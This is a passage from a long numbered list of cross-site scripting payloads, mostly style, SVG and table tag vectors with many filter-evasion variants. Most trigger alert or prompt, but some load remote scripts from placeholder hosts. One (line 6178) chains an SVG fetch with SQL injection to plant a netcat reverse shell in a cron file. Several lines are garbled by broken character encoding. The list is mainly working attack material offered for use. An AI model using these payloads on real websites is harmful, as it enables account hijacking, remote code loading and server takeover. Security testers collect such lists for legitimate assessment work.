  6014. <style TYPE=”text/javascript”>document.vulnerable=true;</style>
  6015. <STYLE TYPE=”text/javascript”>javascript:alert(1);</STYLE>
  6016. <STYLE>width:expression(alert(‘anyunix’));</STYLE>
  6017. <style>*{x:���A����������������(javascript:alert(1))}</style>
  6018. <style>*{x:A(javascript:alert(1))}</style>
  6019. <style>*{x:A(write(1))}</style>
  6020. <style>#x{display:block}#x:target{display:none}@keyframes test {}</style>
  6021. <// style=x:expression\28javascript:alert(1)\29>
  6022. <// style=x:expression\28write(1)\29>
  6023. <// style=x:expression\28write(1)\29>
  6024. </**/style=x:expression\28write(1)\29>
  6025. <// style=x:expression\28write(1)\29> // Works upto IE7 ?http://html5sec.org/#71
  6026. <style>//*{x:expression(alert(/xss/))}//<style></style>
  6027. <;STYLE>;.XSS{background-image:url(“;javascript:alert(‘;XSS’;)”;);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
  6028. <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
  6029. <STYLE>.XSS{background-image:url(“javascript:alert(XSS)”);}</STYLE><A CLASS=XSS></A>
  6030. <STYLE>.XSS{background-image:url(“javascript:confirm(document.location)”);}</STYLE><A CLASS=XSS></A>
  6031. <style>.XSS{background-image:url(“javascript:document.vulnerable=true”);}</STYLE><A CLASS=XSS></a>
  6032. <STYLE>.XSS{background-image:url(“javascript:javascript:alert(1)”);}</STYLE><A CLASS=XSS></A>
  6033. style=\”xss:’” onclick=”alert(1)//’”
  6034. style=xss:’”/onclick=alert(1)//’
  6035. {{(_=’’.sub).call.call({}[$=’constructor’].getOwnPropertyDescriptor(_.__proto__,$).value,0,’alert(1)’)()}}
  6036. {{(_=””.sub).call.call({}[$=”constructor”].getOwnPropertyDescriptor(_.__proto__,$).value,0,”alert(1)”)()}}
  6037. <svg
  6038. <svg%09%0A%0B%0C%0D%A0%00%20onload
  6039. <svg%09%28%3Bonload=confirm(1);>
  6040. <svg %09onload%09=prompt(1)>
  6041. <svg%0Ao%00nload=%09((pro\u006dpt))()//
  6042. <svg%20onload=eval%28%27/*%27%2bURL%29>#*/alert%28document.domain%29
  6043. <svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
  6044. <svg%20onload=evt.target.innerHTML=evt.target.ownerDocument.URL>#<img src=/ onerror=alert(domain)>
  6045. <svg[9,10,12,13,32,47]onload=alert(1)>
  6046. <svg><animate attributename=x end=180 onend=alert(180)>
  6047. <svg><animate attributename=x end=188 onend=alert(188)>
  6048. <svg><animate attributename=x end=1 onend=alert(44)>
  6049. <svg><animate attributeName=x onbegin=alert(190)>
  6050. <svg><animate href=#k attributename=href to=/ from=data:,alert(60)><script/id=k></script>
  6051. <svg><animate onbegin=alert(189)>
  6052. <svg><animate onbegin=alert(45)> <svg><animate attributeName=x onbegin=alert(450)>
  6053. <svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
  6054. <svg><animation x:href=javascript:alert(1)>
  6055. “><svg/a=#”onload=’/*#*/prompt(1)’
  6056. <svg><a><rect width=100% height=100%>
  6057. <svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?>
  6058. <svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>
  6059. <svg><a><rect width=100% height=100% /><animate attributeName=href to=javas&#99ript:alert(1)>
  6060. <svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s>
  6061. <svg><a><script>alert(1)</a>
  6062. <svg><a xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/>click</a></svg>
  6063. <svg><a xml:base=”javascript:alert(1)//” href=”#”><circle r=”100" /></svg>
  6064. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate
  6065. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(176) to=&>
  6066. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
  6067. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
  6068. <svg><![CDATA[><image xlink:href=”]]><img src=xx:x onerror=alert(2)//”></svg>
  6069. <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”</svg>
  6070. <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg>
  6071. <Svg> <! [CDATA [> <imagexlink: href = “]]> <img / src = xx: xonerror = alert (2) //”> </ svg>
  6072. <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg> // By Secalert
  6073. <svg contentScriptType=text/vbs><script>
  6074. <svg contentScriptType=text/vbs><script>MsgBox
  6075. <svg contentScriptType=text/vbs><script>MsgBox+1
  6076. <svg contentScriptType=text/vbs><script>MsgBox”1"<i>
  6077. <svg contentScriptType=text/vbs><script>XSS
  6078. <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
  6079. <svg><div onactivate=alert(‘Xss’)
  6080. <svg><div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
  6081. <svg><doh onload=confirm(1)>
  6082. <svgEonload=alert(1)>
  6083. <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
  6084. <svg id=1 onload=confirm(1)>
  6085. <svg id=alert(1337) onload=eval(id)>
  6086. <svg id=alert(1) onload=eval(id)>
  6087. <svg id=javascript:alert(1337) onload=location=id>
  6088. <svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
  6089. <svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
  6090. <svg id=t:alert(1) name=javascrip onload=location=name+id>
  6091. <svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”>
  6092. <svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’confirm(1)’%3E%3C/svg%3E”>
  6093. <svg/language=vbs onload=msgbox-1
  6094. <svg onclick=popup=1;>
  6095. <svg/onload%0B=prompt(1)>
  6096. <SVG/ONLOAD=&#112&#114&#111&#109&#112&#116(1)
  6097. <SVG/ONLOAD=&#112&#114&#111&#109&#112&#116(1) // Cross Browser
  6098. <svg </onload =”1> (_=alert,_(1)) “”>
  6099. <svg </onload =”1> (_=alert,_(1337)) “”>
  6100. <svg/onload=%26%23097lert%26lpar;1337)>
  6101. <SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
  6102. <SVG ONLOAD=&#97&#108&#101&#114&#116(186)>
  6103. <SVG ONLOAD=&#97&#108&#101&#114&#116(47)>
  6104. <svg+onload=+”aler%25%37%34(1)”
  6105. <! →<svg onload=alert(1)> →
  6106. <svg onload=”alert(1)”
  6107. <svg onload=alert`1`>
  6108. <svg onload=alert(1)>
  6109. <svg onload=alert(1)//
  6110. <svg/onload=alert(1)
  6111. ?�֡�svg onload��alert�]1�^��
  6112. “><svg onload=alert(1)>
  6113. “><svg onload=alert(1)//
  6114. \<svg/onload=alert`1`\>
  6115. <Svg OnLoad=alert(1)>
  6116. ?�֡�svg onload��alert�]183�^��
  6117. <svg onload=(alert)(1) >//INJECTX
  6118. <svg/onload=alert(1)>//INJECTX
  6119. <svg onload=alert&#40;1&#41>
  6120. ‘<’s’v’g’ o’n’l’o’a’d’=’a’l’e’r’t’(‘7’)’ ‘>’
  6121. <svg onload=alert(75)>
  6122. “><svg onload=alert(76)//
  6123. <svg/onload=alert(domain)>
  6124. <svg/onload=alert`INJECTX`>
  6125. <svg/onload=alert(`INJECTX`)>
  6126. <svg/onload=alert(/INJECTX/)>
  6127. <svg onload=alert&lpar;1&rpar;>
  6128. <svg onload=alert(navigator.battery.charging)>
  6129. <svg onload=alert(navigator.battery.dischargingTime)>
  6130. <svg onload=alert(navigator.battery.level)>
  6131. <svg onload=alert(navigator.connection.type)>
  6132. <svg/onload=alert(String.fromCharCode(88,83,83))>
  6133. “><svg/onload=alert(String.fromCharCode(88,83,83))>
  6134. <svg onload=alert(tagName)>
  6135. <svg onload=alert&#x28;1&#x29>
  6136. <svg onload=alert(‘XSS’)>
  6137. <svg/onload=alert(‘XSS’)>
  6138. “><svg/onload=alert(/XSS/)
  6139. <svg/onload=body[name]=URL%0d#</svg><img src=x onerror=alert(1)>”
  6140. <svg/onload=confirm(0);prompt(0);>
  6141. “<svg/onload=confirm(0);prompt(0);>”
  6142. <svg onload=confirm(1)
  6143. <svg/onload=confirm(1)
  6144. “><svg/onload=confirm(58)>”@x.y
  6145. <svg onload=”confirm(7)”>
  6146. “><svg onload=”confirm(7)”>
  6147. “/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>
  6148. “\”/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>”
  6149. “><svg/onload=co\u006efir\u006d`1`>
  6150. <svg+onload=+”[DATA]”
  6151. <svg/onload=document.location.href=’data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=’>
  6152. <svg/onload=document.location.href=’https://google.com'>
  6153. <svg onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>
  6154. <svg onload=document.write(‘XSS’)>
  6155. <svg/onload=eval(atob(location.hash.slice(1)))>
  6156. <svg/onload=eval(atob(location.hash.slice(1)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
  6157. <svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==
  6158. <svg/onload=eval(atob(URL.slice(-148)))>
  6159. <svg/onload=eval(atob(URL.slice(-148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
  6160. <svg onload=eval(document.cookie)>
  6161. <svg onload=eval(location.hash.slice(1)>#alert(1)
  6162. <svg/onload=eval(location.hash.slice(1))>?#alert(1)
  6163. <svg/onload=eval(location.hash.slice(1))>#with(document)
  6164. <svg/onload=eval(location.hash.slice(1))>#with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
  6165. <svg+onload=eval(location.hash.substr(1))>#alert(1)
  6166. <svg/onload=eval(name)>
  6167. <svg onload=eval(URL)>
  6168. <svg onload=eval(URL)>//22
  6169. <svg onload=eval(‘/*’+URL)>#*/alert(document.domain)
  6170. <svg+onload=eval(URL.slice(7,15))>
  6171. <svg/onload=eval(URL.slice(-7))//#alert()
  6172. <svg onload=eval(URL.slice(-8))>#alert(1)
  6173. <svg onload=eval(URL.slice(-8))>#alert(1)/”’></script /K><Svg /onload = confirm(`1`)
  6174. <svg onload=eval(window.name)>
  6175. <svg onload=eval(window.name)//
  6176. <svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/U R/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
  6177. <svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/UR/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
  6178. <svg onload=fetch(“//HOST/?id=0+union+select’*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh’into+outfile’/etc/cron.d/s’”)>
  6179. <svg onload=innerHTML=location.hash>#<script>alert(1)</script>
  6180. <svg/onload=’javascript0x00:void(0)%00?void(0)&colon;confirm(1)’>
  6181. <svg onload=”javascript:alert(123)” xmlns=”#”></svg>
  6182. <svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg"></svg>
  6183. <svg onload=”javascript:alert(9)” xmlns=”http://www.w3.org/2000/svg"></svg>
  6184. <svg onload=��javascript:alert(9)�� xmlns=��http://www.w3.org/2000/svg��></svg>
  6185. <svg/onload=location=’javas’%2B’cript:’%2B
  6186. <svg/onload=location=javas%2Bcript:%2B
  6187. <svg onload=location=’javascript:alert(1)’>
  6188. <svg/onload=location=’javascript:alert(1)’>
  6189. <svg onload=location=’javas’+’cript:’+’ale’+’rt’+location.hash.substr(1)>#(1)
  6190. <svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:
  6191. <svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]#:()
  6192. <svg/onload=location=/javas/.source%2B/cript:/.source%2B
  6193. <svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
  6194. <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/.
  6195. <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/.
  6196. <svg onload=location=location.hash.substr(1)>#javascript:alert(1)
  6197. <svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
  6198. <svg/onload=location=name//>
  6199. <svg/onload=location=name//
  6200. <svg/onload=location=name//>CLICK</a>
  6201. <svg/onload=location=name//��>CLICK</a>
  6202. <svg+onload=location=URL.slice(7,26)>
  6203. <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
  6204. <svg onload=navigator.vibrate(500)>
  6205. <svg onload=navigator.vibrate([500,300,100])>
  6206. <svg/onload=parent[/loca/.source%2b/tion/.source]=name//
  6207. <svg onload=popup=1;>
  6208. <svg/onload=prompt(0);>
  6209. “<svg/onload=prompt(0);>”
  6210. <svg/onload=prompt(1);>
  6211. <svg/onload=prompt(1)
  6212.  — !><svg/onload=prompt(1)
  6213. “><svg/onload=prompt(1)>
  6214. ><svg/onload=prompt(Xss)>
  6215. ��><svg/onload=prompt(��Xss��)>
  6216. “/><svg/onload=(prompt)(/XSS/)>#
  6217. ><svg/onload=prompt(Xss-By-Muhaddi)>
  6218. <svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
  6219. ><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
  6220. “<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”
  6221. “\”><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”,
  6222. “><svg onload=”prompt(/xss/)”></svg>
  6223. <svg onload=setInterval(function(){d=document;
  6224. <svg onload=setInterval(function(){with(document)body.
  6225. <svg/onload=setInterval(function(){with(document)body.
  6226. <svg onload=setInterval(function(){with(document)body.appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
  6227. <svg/onload=setTimeout`alert\`1\``>
  6228. <svg onload svg onload=”javascript:javascript:alert(1)”></svg onload>
  6229. <svg onLoad svg onLoad=”javascript:javascript:alert(1)”></svg onLoad>
  6230. <svg/onload=top[��loca��%2b��tion��]=name//
  6231. <svg/onload=top[loca%2btion]=name//
  6232. <svg/onload=top[/loca/.source%2b/tion/.source]=name//
  6233. <svg/onload=u=URL,l=u.length,location=/javascrip/.source%2Bu[1]%2Bu[4]%2B/alert/.source%2Bu[l-2]%2b1%2Bu[l-1]>#()
  6234. <svg/onload=u=URL,l=u.length,location=/javascrip/.source+u[1]+u[4]+/alert/.source+u[l-2]+1+u[l-1]>#()
  6235. <svg onload=”void ‘javascript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e’;”></svg>
  6236. <svg onload=”void ‘javascript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d
  6237. <svg/onload=window.onerror=alert;throw/XSS/;//
  6238. <svg/onload=window.onerror=confirm;throw/5/;//
  6239. <svg/onload=window.onerror=confirm;throw/XSS/;//”
  6240. <svg/onload=window.onerror=confirm;throw/XSS/;//
  6241. <svg onload=write(1)>
  6242. <svg onresize=”alert(1)”>
  6243. <svg onResize svg onResize=”javascript:javascript:alert(1)”></svg onResize>
  6244. <svg onunload svg onunload=”javascript:javascript:alert(1)”></svg onunload>
  6245. <svg onUnload svg onUnload=”javascript:javascript:alert(1)”></svg onUnload>
  6246. <svg><oooooo/oooooooooo/onload=alert(1) >
  6247. <svg o<script>nload=alert(1)>
  6248. <svg o<script>nload=alert(6)>
  6249. <sVG/renwa/OnLoaD+=”window[‘confirm’]+(1)”>
  6250. <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
  6251. <sVg><scRipt %00>confirm&lpar;1&rpar;
  6252. <sVg><scRipt %00>prompt&lpar;/@soaj1664ashar/&rpar;????????????????
  6253. <svg><script>0<[alert(36)]</script>
  6254. <svg><script>123<1>alert(123)</script>
  6255. <svg><script>alert( 1)
  6256. <svg><script ?>alert(1)
  6257. “><svg><script>alert`1`
  6258. “><svg><script>/<@/>alert(1337)</script>
  6259. <svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
  6260. <svg><script>/<@/>alert(1)</script>//INJECTX
  6261. <svg><script>alert(1)&sol;&sol;!#ERROR?&^%$#</script></svg>
  6262. <svg><script>alert&#40 1&#41
  6263. <svg><script>alert&#40 1&#41
  6264. <svg><script>alert&#401&#41
  6265. <Svg> <script> alert & # 40 1 & # 41
  6266. <svg><script>alert&#40/1/&#41</script>
  6267. <Svg> <script> alert & # 40/1 / & # 41 </ script>
  6268. <svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p>
  6269. <svg><script>alert&grave;1&grave;<p>
  6270. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  6271. <svg><script>alert&lpar;1&rpar;</script>
  6272. <svg><script>a=’<svg/onload=alert(1)></svg>’;alert(2)</script>
  6273. <svg><script>a<svg//onload=confirm(2) />lert(1)</script>
  6274. <svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
  6275. <svg><script ?>confirm(1);
  6276. <svg><script ?>confirm(1)
  6277. <svg><script>confirm&#40/1/&#41</script>
  6278. <svg><script>confirm&DiacriticalGrave;1&DiacriticalGrave;<p><svg><script>confirm&grave;1&grave;<p>
  6279. <svg><script>confirm(“&quot;);confirm(‘yes’)//no”)</script>
  6280. <svg><script>location&equals;&#60&#62javascript&amp;#x3A;alert(1)&#60&#33&#47&#62;</script>
  6281. <svg><script>location&equals;&#60&#62javascript&amp;#x3A;confirm(1)&#60&#33&#47&#62;</script>
  6282. <svg><script>/*&midast;&sol;alert(‘ @0x6D6172696F ‘)&sol;&sol;*/</script></svg>?
  6283. <svg><script>/*&midast;&sol;confirm(3)&sol;&sol;*/</script></svg>
  6284. <svg><script>//&NewLine;confirm(1);</script </svg>
  6285. <svg><script>//&NewLine;confirm(1);</script </svg>
  6286. “/><svg><script>//&NewLine;confirm(1);</script </svg>
  6287. <svg><script onlypossibleinopera:-)> alert(1)
  6288. <svg><script onlypossibleinopera:-)> alert(1)
  6289. <svg><script onlypossibleinopera:-)> confirm(1)
  6290. <svg><script>prompt&#40 1&#41<i>
  6291. <svg><script>prompt&#40;1)<b>
  6292. <svg><script>prompt&#40;1)</script>
  6293. <svg><script>varmyvar=”text”;alert(1)//”;</script></svg>
  6294. <svg><script>varmyvar=”text&quot;;alert(1)//”;</script></svg>
  6295. <Svg> <script> varmyvar = “text & quot ;; alert (1) //”; </ script> </ svg>
  6296. <svg><script>varmyvar=vYourInputv;</script></svg>
  6297. <svg><script>varmyvar=YourInput;</script></svg>
  6298. <Svg> <script> varmyvar = “YourInput”; </ script> </ svg>
  6299. <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js'
  6300. <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js' {Opera}
  6301. <svg><script/XL:href=&VeryThinSpace;data&colon;;;;base64;;;;&comma;&lt;&gt;��YWx��lc��nQ��oMSk��=> mix!
  6302. <svg><script xlink:href=”data:,alert(1)”>
  6303. <svg><script xlink:href=data:,alert(1) /> *
  6304. <svg><script xlink:href=data:,alert(1) />
  6305. <svg><script xlink:href=data:,alert(1) />
  6306. “><svg><script/xlink:href=”data:,alert(1)
  6307. <svg><script xlink:href=data:,alert(174) />
  6308. <svg><script xlink:href=data:,alert(1)></script>
  6309. <svg><script/xlink:href=data:,alert(1)></script>
  6310. <svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/')></script
  6311. <svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/') </script
  6312. <svg><set href=#k attributename=href to=data:,alert(59)><script id=k></script>
  6313. <svg><style>{font-family&colon;’<iframe/onload=confirm(1)>’
  6314. <svg><style>*{font-family:’<svg onload=alert(1)>’;}</style></svg>
  6315. <svg><style>*{font-family:’<svg onload=confirm(1)>’;}</style></svg>
  6316. <svg><style>&lt;img/src=x onerror=alert(1)// </b>
  6317. <svg><style>&ltimg src=x onerror=confirm(1)&gt</svg>
  6318. “><svg><style>{-o-link-source&colon;’<body/onload=confirm(1)>’
  6319. </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert&#x28;1&#x29; {Opera}
  6320. </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>confirm&#x28;1&#x29;
  6321. <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
  6322. <svg[U+000B]onload=alert(1)>
  6323. <svg><use xlink:href=”data:image&sol;svg&plus;xml&semi;ba &NewLine;se&Tab;64&semi;&comma;PHN2ZyBpZD 0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53M y5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3a WR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8 YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0K GxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lk dGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC 9zdmc+#rectangle” /></svg>
  6324. <svg><use xlink:href=data:image/svg+xml;base64,PHN2ZyBpZD0iYnJ1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiPg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYWluKSIvPjwvc3ZnPg==#klutz>
  6325. <svg><use xlink:href=’data:image/svg+xml,<svg id=”klutz” xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink"><embed xmlns=”http://www.w3.org/1999/xhtml" src=”javascript:alert(document.domain)”/></svg>#klutz’>
  6326. <svg><!V-alert(1)-
  6327. <svg><!V’-alert(1)-’
  6328. <svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javas&#99ript:alert(1)>
  6329. <svg xml:base=”data:text/html,<script>confirm(1)</script>”><a xlink:href=”#”><circle r=”40"></circle></a></svg>
  6330. <svg xmlns=”http://www.w3.org/2000/svg">
  6331. <svg xmlns=��http://www.w3.org/2000/svg��>
  6332. <svg xmlns=”http://www.w3.org/2000/svg"> <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(9)”><rect width=”1000" height=”1000" fill=”white”/></a> </svg>
  6333. <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(1)”></g></svg>
  6334. <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(9)”></g></svg>
  6335. <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:confirm(1)”></g></svg>
  6336. <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> //
  6337. <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
  6338. <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
  6339. <Svg xmlns = “http://www.w3.org/2000/svg"> <g onload = “javascript: \ u0061lert (1);”> </ g> </ svg>
  6340. <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> // By Secalert
  6341. <svg xmlns=”http://www.w3.org/2000/svg" id=”foo”>
  6342. <svg xmlns=”http://www.w3.org/2000/svg" id=”x”>
  6343. <svg xmlns=”http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  6344. <svg xmlns=”http://www.w3.org/2000/svg" onload=”alert(document.domain)”/>
  6345. <svg xmlns=”http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
  6346. <svg xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink">
  6347. <svg xmlns=”#”><script>alert(1)</script></svg>
  6348. <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100
  6349. <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href”
  6350. <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
  6351. <Svg xmlns: xlink = “http://www.w3.org/1999/xlink"> <a> <circle r = 100 /> <animate attributeName = “xlink: href” values ??= “; javascript: alert (1 ) “begin =” 0s “dur =” 0.1s “fill =” freeze “/>
  6352. <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/> // By Mario
  6353. <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:confirm(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
  6354. <svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=”&#x3000;javascript:alert(10)” /><a id=x><rect width=100 height=100 /></a>
  6355. <svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=”&#x3000;javascript:alert(1)” /><a id=x><rect width=100 height=100 /></a>
  6356. <svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
  6357. <svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
  6358. <svG x=”>” onload=(co\u006efirm)``>
  6359. <svg><x><script>alert(177)</x>
  6360. <svg><x><script>alert(1)</x>
  6361. <svg/x=”> <script>alert(37)</script> <”onload=alert(370)>
  6362. <svg><x><script>alert&#40;&#39;1&#39;&#41</x>
  6363. <svg></ y=”><x” onload=alert(‘@0x6D6172696F’)>
  6364. <svg></y=”><x” onload=alert(1)>
  6365. <svg></ y=”><x” onload=confirm(4)>
  6366. swfupload.swf?buttonText=test<a href=”javascript:confirm(1)”><img src=”https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
  6367. swfupload.swf?movieName=”]);}catch(e){}if(!self.a)self.a=!alert(1);//
  6368. <[S]x onx[S]xx=1
  6369. ‘/(\t)/’,
  6370. <table background=”javascript:alert(1)”></table>
  6371. <table background=javascript:alert(1)></table>
  6372. <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6
  6373. <TABLE BACKGROUND=”javascript:alert(‘XSqS’)”>
  6374. <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
  6375. <TABLE BACKGROUND=”javascript:alert(XSS)”>
  6376. <table background=javascript:alert(/xss/)></table>/
  6377. <;TABLE BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TABLE>;
  6378. <TABLE BACKGROUND=”javascript:alert(‘XSS’)”></TABLE>
  6379. <TABLE BACKGROUND=”javascript:confirm(document.location)”>
  6380. <table BACKGROUND=”javascript:document.vulnerable=true;”>
  6381. <table background=”javascript:javascript:alert(1)”>
  6382. <TABLE BACKGROUND=”javascript:javascript:alert(1)”>
  6383. <TABLE id=XSS BACKGROUND=”javascript:alert(‘XSS’)”>
  6384. <TABLE id=XSS><TD BACKGROUND=”javascript:alert(‘XSS’)”>
  6385. <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>”
  6386. <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
  6387. <TABLE><TD BACKGROUND=”javascript:alert(XSS)”>
  6388. <;TABLE>;<;TD BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TD>;<;/TABLE>;
  6389. <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”></TD></TABLE>
  6390. <table><TD BACKGROUND=”javascript:document.vulnerable=true;”>
  6391. <TABLE><TD BACKGROUND=”javascript:javascript:alert(1)”>
  6392. <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bconfirm(1)%09><td>AAAAAAAAA
